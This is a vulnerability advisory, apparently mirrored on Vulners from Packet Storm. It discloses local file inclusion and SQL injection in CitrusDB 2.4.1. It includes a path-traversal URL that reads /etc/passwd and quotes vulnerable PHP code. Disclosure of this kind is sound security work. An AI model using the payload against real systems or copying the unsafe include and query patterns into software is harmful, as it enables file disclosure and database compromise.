Lucene search
K

CitrusDB 2.4.1 Local File Inclusion / SQL Injection

🗓️ 07 Apr 2012 00:00:00Reported by Michal BlaszczakType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

CitrusDB 2.4.1 LFI/SQLi Vulnerability, open source customer service and billing databas

Code
`CitrusDB 2.4.1 - LFI/SQLi Vulnerability  
Author: Michal `wacky` Blaszczak   
WWW: blaszczakm.blogspot.com  
  
  
CitrusDB is an open source customer service and billing database.  
It can be used by customer service personnel to provide sales and support to customers,   
and by billing staff to bill customers for their services via invoices and credit card batches.   
Customers may access the Online customer account manager to view their services, billing history,  
and make service and support requests online.  
  
1) LFI  
http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base  
  
index.php:315  
  
$filepath = "$path_to_citrus/$load.php";  
if (file_exists($filepath)) {  
include('./'.$load.'.php');  
  
  
2) SQL INJECTION  
  
include/user.class.php:134  
  
$sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Apr 2012 00:00Current
0.1Low risk
Vulners AI Score0.1
23